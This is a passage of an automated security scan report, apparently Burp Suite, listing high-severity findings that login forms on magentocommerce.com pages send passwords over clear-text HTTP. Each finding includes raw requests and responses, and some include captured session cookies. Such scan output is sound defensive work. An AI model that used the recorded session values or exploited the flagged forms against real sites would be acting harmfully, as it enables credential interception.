Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Fsolution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.110. http://www.magentocommerce.com/partners/view/117/gorilla  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/view/117/gorilla

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/view/117/gorilla HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176374; expires=Sat, 11-Aug-2012 15:12:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fpartners%2Fview%2F117%2Fgorilla%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:54 GMT
Content-Length: 57995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.111. http://www.magentocommerce.com/pl  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.112. http://www.magentocommerce.com/product/community-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/community-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/community-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Fcommunity-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 32482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.113. http://www.magentocommerce.com/product/compare  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/compare

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/compare HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175710; expires=Sat, 11-Aug-2012 15:01:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fproduct%2Fcompare%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:50 GMT
Content-Length: 47177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.114. http://www.magentocommerce.com/product/deployed-solutions  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/deployed-solutions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/deployed-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175705; expires=Sat, 11-Aug-2012 15:01:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:45 GMT
Content-Length: 32561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.115. http://www.magentocommerce.com/product/emerging-business  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/emerging-business

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/emerging-business HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_activity=1313170894; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.2.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171056; expires=Sat, 11-Aug-2012 13:44:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:16 GMT
Content-Length: 33707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.116. http://www.magentocommerce.com/product/enterprise-community-faqs  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-community-faqs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/enterprise-community-faqs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175681; expires=Sat, 11-Aug-2012 15:01:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproduct%2Fenterprise-community-faqs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:21 GMT
Content-Length: 42996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.117. http://www.magentocommerce.com/product/enterprise-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175633; expires=Sat, 11-Aug-2012 15:00:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:00:33 GMT
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.118. http://www.magentocommerce.com/product/enterprise-level  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-level

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/enterprise-level HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; exp_domain=magentocommerce.com; exp_last_visit=997810832; exp_last_activity=1313170832; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.1.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; homepage_intro=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 32647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.119. http://www.magentocommerce.com/product/faq  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/faq

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/faq HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175724; expires=Sat, 11-Aug-2012 15:02:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fproduct%2Ffaq%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:04 GMT
Content-Length: 38677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.120. http://www.magentocommerce.com/product/features  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/features

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/features HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fproduct%2Ffeatures%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 47349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.121. http://www.magentocommerce.com/product/hosted-solutions  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/hosted-solutions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/hosted-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175686; expires=Sat, 11-Aug-2012 15:01:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fhosted-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:26 GMT
Content-Length: 32763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.122. http://www.magentocommerce.com/product/magento-go  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-go

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/magento-go HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175671; expires=Sat, 11-Aug-2012 15:01:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fproduct%2Fmagento-go%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:11 GMT
Content-Length: 36074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.123. http://www.magentocommerce.com/product/magento-zend  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-zend

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/magento-zend HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
